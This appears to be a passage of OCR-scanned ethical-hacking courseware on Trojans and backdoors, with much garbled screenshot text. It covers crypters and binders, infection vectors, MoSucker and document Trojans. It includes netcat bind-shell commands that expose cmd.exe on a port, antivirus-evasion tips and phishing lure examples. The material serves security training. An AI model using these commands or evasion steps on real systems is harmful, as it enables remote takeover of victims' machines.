□ c!D 1c1‫״‬ ifrtt9rf[ jSir?1

'Cn'W.'Ui. » » * > 5 6

3 ««b

SC8 LAB’S

Pronessonal Malware Tod
| !• H r fl rfrr.fvli t
tndcx ) Crrptor Blndtr Downloador [ Spreader

Kriptomatik

!_________________________ Nome______| Poll‫־‬
SC&Ldb... C:\D 0 CUmemts arid S(1M ir1Qs\Atl111i .. No .1 ^ d‘ j0 " " ‫| ־‬cument$. .‫״‬ _ j!to__

.

V ‫־־‬
No

j
|

Advanced File Joiner
|T h ea tta c h e dfile sw e ig h7 1 4K B

SCB LAB's - Professional Malware Tool
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

Wrapper Covert Programs
K rip to m atik
Kriptomatik is a wrapper covert program that is designed to encrypt and protect files { against crackers and antivirus software. It spreads via Bluetooth and allows you to burn CD/DVDs with Autorun. It has the following features: 0 0 e Configure icons Gather files Posts

© Propagation 0 Other features such as autostart, attributes, encryption, etc.

Module 06 Page 852

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

File Nam e jJjIxRAYMYPC-INSTALL.MSI Hb8thc.exe

File Path C:\DocumentsandSettings\k-ADes... C:\Documents and Settings\ .,Des...

File Size 4M b 379 Kb

Inject To %apppath% %apppath%

Extract To %none% %none%

Status : all spread com m ands unchecked...

Plugin Count: 0006

FIGURE 6.6: Kriptomatik screenshot

5 -----® A dv an ced F ile Jo in er
Advanced File Joiner is software that is used to combine and join various files into a single file. If you have downloaded multiple pieces of a large file split into smaller files, you may easily join them together with this tool. For example, you can combine ASCII text files or combine video files such as MPEG files into a single file if and only if they are of same size, format, and encoding. This tool cannot be used effectively for joining a file format containing head information such as AVI, BMP, JPEG, and DOC files. So, for each of these types of file formats, you have to use specific software join program.

Module 06 Page 853

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

File List Anti Debugging Com pile Ftes Event Logs About

|© | C:\Docum ents and Settings^ V>esktop\M usic.wav 58 nc:\Documents and Settings\ \Desktop\iusion_b... 392 Kb

1 1

Add To File File Path:

Execute: Yes

FIGURE 6.7: Advanced File Joiner Screenshot

Module 06 Page 854

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

SCB LAB’s - P ro fessio n al M alw are Tool
Professional Malware Tool is designed to encrypt (crypter), together (binder), download (downloader), and files spread (spread).

SC8 LAB'S Profiesswial Malware Tool
t ,V ‫■« ׳‬

Index | Crypter

Binder

Downloader

Spreader

Name

Path

Execute No No

] SC B Lab... C:\DocumentsandSettings\Admi... *“ icuments and Settings\Admi... Add file Execute ► Yes Build! No Remove file

|The attached files weigh 714 KB

FIGURE 6.8: SCB LAB's - Professional Malware Tool Screenshot

Module 06 Page 855

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D ifferent Ways a Trojan can Get into a S ystem
Instant Messenger applications Browser and email software bugs

CEH

IRC (Internet Relay Chat)

Physical Access

Fake programs

r
1

\
2 3 4

r
5

\
6

r
7

\
8

r
9

\

Legitimate "shrinkwrapped" software packaged by a disgruntled employee

Attachments

Untrusted sites and freeware software

NetBIOS (FileSharing)

Downloading files, games, and screensavers from Internet sites

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

D ifferent W ays a T ro jan C an G et into a System
Different access points are used by Trojans to infect the victim's system. With the help of these points, the Trojan attacks the target system and takes complete control over the system. They are as follows:

In s ta n t M e s s e n g e r A p p licatio n s
The system can get infected via instant messenger applications such as ICQ or Yahoo Messenger. The user is at high risk while receiving files via the messenger, no matter from whom or from where. Since there is no file checking utility bundled with instant messengers, there is always a risk of infection by a Trojan. The user can never be 100% sure who is on the other side of the computer at any particular moment. It could be someone who hacked a messenger ID and password and wants to spread Trojans over the hacked friends list.

IRC (In te rn et R elay C hat)
IRC is another method used for Trojan propagation. Trojan.exe can be renamed something like Trojan.txt (with 150 spaces).exe. It can be received over IRC and, in the DCC (Direct Client to Client), it will appear as •TXT. The execution of such files will cause infection. Most people do not notice that an application (.exe) file has a text icon. So before

tA

Module 06 Page 856

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

such things are run, even if it is with a text icon; the extensions must be checked to ascertain that they are really .TXT files. 9 Do not download any files that appear to be free porn or Internet software. Novice computer users are often targets of these false offers, and many people on IRC are unaware of security. Users get infected from porn-trade channels, as they are not thinking about the risks involved—just how to get free porn and free programs.

irt ‫־‬1 ‫ !־‬P h y sic a l A ccess

LiJ
0 9

Restricting physical access is important for a computer's security. Example: A user's friend wants to have physical access to his system. The user might sneak into his friend's computer room in his absence and install a Trojan by copying the Trojan software from his disk onto the hard drive. Autostart is another way to infect a system while having physical access. When a CD is placed in the CD-ROM tray, it automatically starts with a setup interface. An example of the Autorun.inf file that is placed on such CDs:

9

[autorun] open=setup.exe icon=setup.exe 9 9 Trojan could be run easily by running a real setup program. Since many people do not know about this CD function, their machine might get infected, and they would not understand what happened or how it was done. The Autostart functionality should be turned off by doing the following: Device Manager ■ ‫־‬ > CDROM ‫־‬ ‫־‬ >

9

Start ‫־‬ ‫־‬ > Settings ‫ >־‬Control Panel -> System Properties ■) Settings

Once there, a reference to Auto Insert Notification will be seen. (It checks approximately once per second whether a CD-ROM has been inserted, or changed, or not changed.) To avoid any problems with this function, it should be turned off.

B row ser an d E m ail Softw are B ugs
Users do not update their software as often as they should, and many attackers take advantage of this well-known fact. Imagine an old version of Internet Explorer being used. A visit to a malicious site will automatically infect the machine without downloading or executing any program. The same scenario occurs while checking email with Outlook Express or some other software with well-known problems. Again, the user's system will be infected without even downloading an attachment. The latest version of the browser and email software should be used, because it reduces the risk of these variations.

Module 06 Page 857

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9

Check the following sites to understand how dangerous these bugs are, all due to the use of an old version of the software:
9 9 http://www.guninski.com/browsers.html http://www.guninski.com/netscape.html

F ak e P ro g ra m s
9

Attackers can easily lure a victim into downloading free programs that are suitable for their needs, and loaded with features such as an address book, access to check several POP3 accounts, and many other functions that make it even better than the currently used email client. The victim downloads the program and marks it as TRUSTED, so that the protection software fails to alert him or her of the new software being used. The email and POP3 account passwords are mailed directly to the attacker's mailbox without anyone noticing. Cached passwords and keystrokes can also be mailed. The aim is to gather ample information and send it to the attacker. In some cases, an attacker may have complete access to a system, but what the attacker does depends on his or her ideas about how to use the hidden program's functions. While sending email and using port 25 or 110 for POP3, these could be used for connections from the attacker's machine (not at home, of course, but from another hacked machine) to connect and use the hidden functions they implemented in the freeware program. The idea here is to offer a program that requires a connection with a server be established. Attackers thrive on creativity. Consider an example where a fake audio galaxy, which is a site for downloading MP3, is given. An attacker generates such a site by using 15-gb space on his system to place a larger archive there for the MP3. In addition, some other systems are also configured in the same fashion. This is done to fool users into thinking that they are downloading from other people who are spread across the network. The software acts as a backdoor and will infect thousands of naive users using ADSL connections. Some fake programs have hidden codes, but still maintain a professional look. These websites link to anti-Trojan software, thus fooling users into trusting them. Included in the setup is readme.txt. This can deceive almost any user, so proper attention needs to be given to any freeware before it is downloaded. This is important because this dangerous method is an easy way to infect a machine via Trojans hidden in the freeware.

9

9

9

9

Module 06 Page 858

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

—.

S h rin k -W rap p ed Software

‫| י‬ Legitimate "shrink-wrapped" software packaged by a disgruntled employee can contain Trojans.

Via A ttach m en ts
When unaware web users receive an email saying they will get free porn or free Internet access if they run an attached .exe file, they might run it without completely understanding the risk to their machines. 0 Example: 0 A user has a good friend who is carrying out some research and wants to know about a topic related to his friend's field of research. He sends an email to his friend asking about the topic and waits for a reply. The attacker targeting the user also knows his friend's email address. The attacker will simply code a program to fake the email From: field and make it appear to be the friend's email address, but it will include the TROJANED attachment. The user will check his email, and see that his friend has answered his query in an attachment, and download and run it without thinking that it might be a Trojan. The end result is an infection. Trash email with the subject line, "Microsoft IE Update," without viewing it. Some email clients, such as Outlook Express, have bugs that automatically execute the attached files.

0 0

U ntru sted Sites an d F re e w a re Softw are
0 A site located at a free web space provider or one just offering programs for illegal activities can be considered suspicious. 0 There are many underground sites such as NeuroticKat Software. It is highly risky to download any program or tool located on such a suspicious site that can serve as a conduit for a Trojan attack on a victim's computer. No matter what software you use, are you ready to take that risk? Many sites are available that have a professional look and contain huge archives. These sites are full of feedback forms and links to other popular sites. Users must take the time to scan such files before downloading them, so that it can be determined whether or not they are coming from a genuine site or a suspicious one. Software such as mIRC, ICQ, PGP, or any other popular software must be downloaded from its original (or official dedicated mirror) site, and not from any other websites that may have links to download supposedly the same software. Webmasters of well-known security portals, who have vast archives with various "hacking" programs, should be responsible for the files they provide and scan them often with anti-virus and anti-Trojan software to guarantee the site to be "free of Trojans and viruses." Suppose an attacker submits a program infected with a Trojan,

0

0

0

0

Module 06 Page 859

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9

e.g., a UDP flooder, to the webmaster for the archive; if the webmaster is not alert, the attacker may use the webmaster's irresponsibility to infect the site's files with a Trojan. Users who deal with any kind of software or web application should scan their systems on a daily basis. If they detect any new file, it should be examined. If any suspicion arises regarding the file, it must be forwarded to software detection labs for further analysis. It is easy to infect machines using freeware programs. ‫״‬Free is not always the best" and hence these programs are hazardous for systems.

tJ

Q

NetBIOS (File S haring)
If port 139 on the system is open, i.e., file sharing is enabled, it can be used by others to access the system, install trojan.exe, and modify a system's file. 9 The attacker can also use a DoS attack to shut down the system and force a reboot, so the Trojan can restart itself immediately. To block file sharing in the WinME version, go to: 9 9 Start ‫־‬ ‫־‬ > Settings -> Control Panel Network ‫־‬ ‫־‬ > File and Print Sharing

Uncheck the boxes there. This will prevent NetBIOS abuse.

D ow n lo ad in g
Downloading files, games, and screensavers from Internet sites can be dangerous.

Module 06 Page 860

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

How to Deploy a Trojan
M ajor Trojan Attack Paths: » User clicks on the malicious link

(c rtifw d IUm jI K mIm

c EH

8 User opens malicious email attachments

Attacker installs the Trojan infecting his machine Trojan is sent to the victim

Trojan Server

(Russia)

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

How to D eploy a T rojan
A Trojan is the means by which an attacker can gain access to the victim's system. In order to gain control over the victim's machine, an attacker creates a Trojan server, and then sends an email to a victim containing a link to the Trojan server. Once the victim clicks on the link sent by the attacker, it connects him or her directly to the Trojan server. The Trojan server sends a Trojan to the victim system. The attacker installs the Trojan, infecting the victim's machine. As a result, victim is connected to the attack server unknowingly. Once the victim connects to an attacker server, the attacker takes complete control over the victim's system and performs any action the attacker chooses. If the victim carries out any online transaction or purchase, then the attacker can easily steal sensitive information such as credit card details, account information, etc. In addition, attackers can also use the victim's machine as the source for launching attacks on other systems. Computers typically get infected by users clicking on a malicious link or opening an email attachment that installs a Trojan on their computers that serves as a back door to criminals who can then command the computer to send spam email.

Module 06 Page 861

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

ru E d * v i* * T o o bh » s m o « n o o &
B i‫־‬ *!** Hffty Al fat•ft6

x Orlrfa

O

O

I ■ v D

Subject:

Apo« A**a0f•Odorm ?2 7867

Computers typically get infected by clicking on a malicious link or opening an e-mail attachment that installs a Trojan on their computers that serves as a back door to criminals who can then command the computer to send spam email

Apple Store
Call 1-800-MY-APPLE Dear Customer

Link to Trojan Server

The Trojan connects to the attack server

4

xlfnake changes to yelr To view the most up-to-date status 8nd| Apple Online Store order, visit online y|ur Qrc^r Siatus. |
You car. aJso contact Apple Store Customer Servicc a: 1-800-576-2775 or vu t cniat for mere nfo: 1r.aCoc.

Attacker sends an email to victim containing link to Trojan server

Victim

Immediately connects to Trojan server in Russia

Internet

Attacker installs the Trojan infecting his machine

la
Trojan Is sent to the victim

Trojan Server

(Russia)

FIGURE 6.9: Diagrammatical representation of deploying a Trojan in victims system

Module 06 Page 862

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

E v a d in g A nti-V irus T e c h n iq u es

Break the Trojan file into multiple pieces and zip them as single file

Never use Trojans downloaded from the web (antivirus can detect these easily)

ALWAYS write your own Trojan and embed it into an application

Change the content of the Trojan using hex editor and also change the checksum and encrypt the file

Change Trojan's syntax:
« e Convert an EXE to VB script Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hide "known extensions", by default, so it shows up only .DOC, .PPT and .PDF)
Copyright © by EG-Gouncil . All Rights Jte$ervfei;Reproduction is Strictly Prohibited.

E v ad ing A ntivirus T e c h n iq u e s
The following are the various techniques used by Trojans, viruses, and worms to evade most of antivirus software: 1. Never use Trojans downloaded from the web (antivirus detects these easily). 2. Write your own Trojan and embed it into an application. 3. Change the Trojan's syntax: 0 0 0 Convert an EXE to VB script Convert an EXE to a DOC file Convert an EXE to a PPT file

4. Change the checksum. 5. Change the content of the Trojan using a hex editor. 6. Break the Trojan file into multiple pieces.

Module 06 Page 863

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

So far, we have discussed various concepts of Trojans and the way they infect the system. Now we will discuss various types of Trojans that are used by attackers for gaining sensitive information through various means.

Trojan Concepts

Countermeasures

J

Trojans Infection

Anti-Trojan Software

^—
v‫ ׳‬-

Types of Trojans

y ‫׳‬ )

Penetration Testing

I 1 Trojan Detection

This section covers various types of Trojans such as command-shell Trojans, document Trojans, email Trojans, botnet Trojans, proxy server Trojans, and so on.
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Module 06 Page 864

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T y p e s o f T r o ja n s
/ i VNC Trojan

CEH
/ D a ta Hiding*. /*Destructive**. : . ‫־‬ Trojan : /*Docum ent

\
: :

/*HTTP/HTTPS\ Trojan

/*ICMP

\ :

: ;

Trojan

;

Trojan

!

Trojan

a

a

Types of Trojans
Various types of Trojans that are intended for various purposes are available. The following is a list of types of Trojans: 0 0 0 0 0 0 VNC Trojan HTTP/HTTPS Trojan ICMP Trojan Command Shell Trojan Data Hiding Trojan Destructive Trojan 0 0 0 0 0 0 0 0 0 0 Proxy Server Trojan Botnet Trojan Covert Channel Trojan SPAM Trojan Credit Card Trojan Defacement Trojan E-banking Trojan Notification Trojan Mobile Trojan MAC OS X Trojan

© Document Trojan 0 0 0 0 GUI Trojan FTP Trojan E-mail Trojan Remote Access Trojan

Module 06 Page 865

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

C om m and Shell Trojans
J J Command shell Trojan gives remote control of a command shell on a victim's machine

CEH

Trojan server is installed on the victim's machine, which opens a port for attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine

Com mand Shell Trojans
The command shell Trojan gives remote control of a command shell on a victim's machine. The Trojan server is installed on the victim's machine, which opens a port for the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine.

C:> nc <ip> <port> C:> nc -L -p <port> -t -e cmd.exe
FIGURE 6.10: Attacker launching command shell Trojan in victim's machine

Module 06 Page 866

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

C o m m a n d S h ell Trojan: N etca t

CEH

c:\>nc.exe -h
[▼1.10 NT] connect to listen for options: -d -e -g —G -h -i ‫־‬1 -L -n -o -p -r -t -u s canewhere : inbound: n c ]‫־‬options] hostname port[s] [ports [ ... n c -1 -p p o r t [options] [hostname] [port] det a c h f r o m console, stealth mode inbound p r o g r a m to exec [dangerous ! !] source-routing h o p p o i n t [s] , u p to 8 source-routing pointer: 4, 8, 12, ... this cruft d e lay interval for lines sent, ports scanned listen mode, for inbound connects listen harder, re-listen on socket close numeric-only IP a d d r e s s e s , no DNS hex dump of traffic local p o r t number randomize local an d remote ports local source address answer TELNET negotiation UD P mode verbose [use twice to be more verbose] timeout for connects an d final ne t reads zero-l/O mode [used for scanning] [inclusive]

prog gateway nu m secs

file port

-a addr

‫־‬ ‫־‬ ▼
-w secs -z

p o r t numbers ca n be individual o r ranges: m ‫־‬n C:\>

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

C o m m a n d Shell Trojan: N etcat
Using Netcat, an attacker can set up a port or a backdoor that will allow him or her to telnet into a DOS shell. With a simple command such as C:\>nc -L -p 5000 -t -e cmd.exe, the attacker can bind port 5000. With Netcat, the user can create outbound or inbound connections, TCP or UDP, to or from any port. It provides for full DNS forward/reverse checking, with appropriate warnings. Additionally, it provides the ability to use any local source port, any locally configured network source address, and it comes with built-in port-scanning capabilities. It has a built-in loose source-routing capability and can read command-line arguments from standard input. Another feature is the ability to let another program respond to inbound connections (another program service established connections). In the simplest usage, ‫״‬nc host port" creates a TCP connection to the given port on the given target host. The standard input is then sent to the host, and anything that comes back across the connection is sent to the standard output. This continues indefinitely, until the network side of the connection shuts down. This behavior is different from most other applications, which shut everything down and exit after an end-of-file on the standard input. Netcat can also function as a server by listening for inbound connections on arbitrary ports, and then doing the same reading and writing. With minor limitations, Netcat does not really care if it runs in client or server mode; it still moves data back and forth until there is none left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side.
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Module 06 Page 867

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Features: 0 0 0 0 0 0 0 0 0 0 0 0 Outbound or inbound connections, TCP or UDP, to or from any port Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally configured network source address Built-in port-scanning capabilities, with randomizer Built-in loose source-routing capability Can read command-line arguments from standard input Slow-send mode, one line every N seconds Hex dump of transmitted and received data Optional ability to let another program service establish connections Optional telnet-options responder using the command nc I -p 23 -t -e cmd.exe Where 23 is the port for telnet, I option is to listen, -e option is to execute, -t option tells Netcat to handle any telnet negotiation the client might expect

Netcat is a utility used for reading and writing the networks that support TCP and UDP protocols. It is a Trojan that is used to open either the TCP or UDP port on a target system and hackers with the help of Telnet gain the access over the system. Command Prompt
c:\>nc.exe -h
[vl.10 NT] connect to somewhere : listen for inbound: options: -d -e prog -g gateway -G num -h -i secs -1 -L -n -o file ‫־‬P port -r -s addr -t -u -v -w secs -z nc [-options] hostname port[s] [ports] ... nc -1 -p port [options] [hostname] [port] detach from console, stealth mode inbound program to exec [dangerous!!] source-routing hop point[s], up to 8 source-routing pointer: 4, 8, 12, ... this cruft delay interval for lines s e n t , ports scanned listen m o d e , for inbound connects listen harder, re-listen on socket close numeric-only IP addresses, no DNS hex dump of traffic local port number randomize local and remote ports local source address answer TEI2JET negotiation UDP mode verbose [use twice to b e more verbose] timeout for connects and final net reads zero-l/O mode [used for scanning] ▲


port numbers can be individual or ranges: m-n [inclusive] C:\>

FIGURE 6.11: Netcat screenshot

Module 06 Page 868

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

GUI T ro ja n : M o S u c k e r

MoSucker 3.0
Selected Server:

|z :\C & tv 8Module 0 6Trojans and Backdoors\Trojans Type
Server ID: Cypher Key: Victim's Name: Server Name(s): Extension(*): Cormecbon-eort:

[

£‫ ב‬Close

]

O

15017MQWEY3C:4264200TPGNDEVC ‫־־‬ TWQPCUL25873IVFCSJQK13761 |vk:t m

1

]

‫ש‬ ‫ש‬ ‫ש‬

kerne!32,msc0nfig,vvinexec32,netconfig‫״‬ exe,p!f‫״‬t>at,(i,jpe,com,bpq,xtr,txp, |4288|

0
‫ש‬ ‫ש‬

W Prevent same server multHnfecbons (recommended) You may select a windows icon to assooate with your custom file extension/s.

Sead

Save

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

GUI Trojan: M oS ucker
Source: http://www.dark-e.com

MoSucker is a Visual Basic Trojan. MoSucker's edit server program lets the infection routine be changed and notification information set. MoSucker can auto load with the system.ini and/or the registry. Unlike any other Trojan, MoSucker can be set to randomly choose which method to auto load. It can notify cell phones via SMS in Germany only. MuSucker's edit server can gain X number of kilobytes (X is either a static number or it is random each time). The standard error message for MoSucker is "Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, try downloading again." Here is a list of file names MoSucker suggests to name the server: MSNETCFG.exe, unin0686.exe, Calc.exe, HTTP.exe, MSWINUPD.exe, Ars.exe, NETUPDATE.exe, and Register.exe. Server Features: 0 Q Chat with victim Clipboard manager

© Close/remove server e 9 Control mouse Crash System File Manager

Module

06 Page 869

Ethical Hacking and Countermeasures Copyright © by

EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

0 0 0 0 0 0 0 0 0 0 0

Get passwords entered by user, system info Hide/Show start button, system tray, taskbar Keylogger Minimize all windows Open/close CD-ROM drive Ping server Pop-up startmenu Process manger Shutdown/Reboot/Standby/Logoff/Dos mode server System keys on/off Window manager
About _ ‫א‬

| Options | S 3

£N t Q

Misc stuff Information File related System Spy related Fun stuff I Fun stuff II Live capture

5 ‫'׳ ־‬/‫׳‬

‫ ׳‬f t ‫;׳‬
version 3.0

u iw iu .m a s u c k c r . t h

FIGURE 6.12: MoSucker screenshot

Module 06 Page 870

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

*
Selected Server Name/Port Password Autostart Notification 1 Notification 2 Options Events Bind Files Keylogger Plug-ins/Kill Fake Error File Properties Icons < Connection-gort: Server ID: Cypher Key: Victim's Name: Server Name(s): Extension (s):

MoSucker 3.0
|z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Type

C clClose

|

O

1501704QWEYX:4264200TPGNDEVC TWQPCUL25873IVFCSJQK13761 Victim kemel32‫׳‬msc0nfigrwinexec32,netconfig‫׳‬ exe,pif,bat,dli‫׳‬jpe‫׳‬comrbpq,xtr,txp, 4288|

‫ש‬ ‫ש‬ ‫ש‬ ‫ש‬ ‫ש‬

[‫י‬/ Prevent same server multi-infections (recommended) You may select a windows icon to associate with your custom file extension/s.

>

Read

Save

Exit

FIGURE 6.13: MoSucker showing victim's name and connection port

Module 06 Page 871

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

GUI Trojan: Jum per and Biodox

CEH

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

GUI Trojan: J u m p e r a n d Biodox
Jumper is a malicious malware program that performs many functions to download malicious malware from the Internet. Attackers use this jumper Trojan to get sensitive data like financial information from the user's system. It also downloads additional downloads for the attacker to be able to access the system remotely. Generally, the BIODOX OE Edition.exe file should be in the C:\Windows\System32 folder; if it has been found elsewhere, then it is a Trojan. Once the computer gets infected by the Biodox, the system performance decreases. The screensaver gets changed automatically. Continuous annoying advertisement pop-ups appearing on the computer can be treated as one of the symptoms of this Trojan.

Module 06 Page 872

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

ftodox Open Source t
*‫׳‬ID 0 4 432 soc 544 li-Jcsss-eie 552 m y*■ r ■ ‫׳‬ ■ MO 628 MO 648 J 'r e . ‫־‬ S36 UsvOwsteJie we 1‫•* |י‬.cfcott t x t 992 Ut I svetwst n r 1016 3r.cN> st ext 244 296 S jU t o c * . _Jr.ch 0 it t x t 360 L-J [system pr. D um m " ‫ "׳׳‬0‫ ׳‬V 0 0 929792 5*01632 7430144 4t496*« 62873 60 7188480 10*21*32 4612800 641*432 7192576 9965568 7016448 33181696 12562432 12091392 » ‫ ״‬, • Non* Normal Norm* . 1

,

System Sy»tem System System System System System System System System System System System System System System System

a

Normal Norm ■ Norm* S0rr\» Norma( Norm* Norm* Norm ■ Norm ■ Normal

M

Status - weerufuly

Clear Applicator Lht

FIGURE 6.13: Screenshots showing Biodox and Jumper

Module 06 Page 873

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D ocum ent Trojans
VIA LETTER John Stevens Royal Communications Company 445 152thStreet S.W. Washington, DC 20554 Dear Mr. Stevens: We have received a package addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment which is listed as Apple iMac 24‫ ׳‬Computer. Please call us at Fedex at 1800-234-446 Ext 345 or e-m ail me at m.roberts@fedex.com regarding this shipment. Please visit our Fedex Package Tracking Website to see more details about this shipment and advice us on how to proceed. The website link is attached with this letter.

CEH
!B e!
Attacker

FecEx
September 2, 2012

RE: Fedex Shipment Airway Bill Number: 867676340056

Attacker embeds Trojan into a Word document and infects victim computer

Victim's
Package

Trojan embedded in Word document

System

Sincerely, Michelle Roberts Customer Service Representative International Shipment and Handling Fedex Atlanta Division Tel: 1800-234-446 Ext 345 http://www.fedex.com m.roberts@fedex.com

Trojan is executed as victim opens the document and clicks on Trojan package

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

D o c u m en t T ro jan s
Most users usually have the tendency to update their operating system but not the application they use regularly. Attackers take this opportunity to install document Trojans. Attackers usually embed a Trojan into a document and transfer it in the form of an attachment in emails, office documents, web pages, or media files such as flash and PDFs. When a user opens the document with the embedded Trojan assuming it is a legitimate one, the Trojan is installed on the victim's machine. This exploits the application used to open the document. Attackers can then access sensitive data and perform malicious actions.

Module 06 Page 874

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Attacker

m
Attacker embeds Trojan into a Word document and infects victim computer

® ‫ז ־!!! ־‬

s

m
Trojan is executed as victim opens the document and clicks on Trojan package FIGURE 6.13: Attacker infecting victim's machine using Document Trojan

An example of a Trojan embedded in a Word document is as follows:
VIA LETTER John Stevens R^alC^muniraUonsCompany 445 152thStreet S.W. Washington, DC 20554

FecEx
Sep tem b er 2, 2012 r

RE: Fedex Shipment Airway Bill Number: 867676340056 Dear Mr. Stevens: W e have received a package addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment which is listed as Apple iMac24' Computer. Please call us at Fedex at 1800-2 34-446 Fxt 3450r e-mail meat m.robcrts(S>fedex.com regarding this shipment. Please visit our Fedex Package Tracking website to see more details about this shipment and advice us on howto proceed. The website link is attached with this letter.

'• ‫י‬‫״‬ * P a c k a Q e
Sincerely, Michelle Roberts Customer Service Representative International Shipment and Handling Fedex Atlanta Division Tel: 1800-234-446 Ext 345 http://www.fedex.com m.rohertsgOfpdex.com

Trojan embedded in Word document

Module 06 Page 875

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

FIGURE 6.14: An example of Trojan embedded in a Word document

E-m ail Troj ans
J J J Attacker gains remote control of a victim computer by sending email messages Attackers can then retrieve files or folders by sending commands through email Attacker uses open relay SMTP server and fakes the email's FROM field to hide origin

CEH
'(m y / ‫\ן‬ - \ 7‫ן‬

Instructions are sent to the victim through emails Send me :\creditcard.txt file and launch calc.exe

Any commands for me? Here is the requested file

mt Email
Calc.exe executed

Attacker

Internet

Firewall

Victim

Copyright G by EG-GtlMCil. All Rights Reserved. Reproduction is Strictly Prohibited.

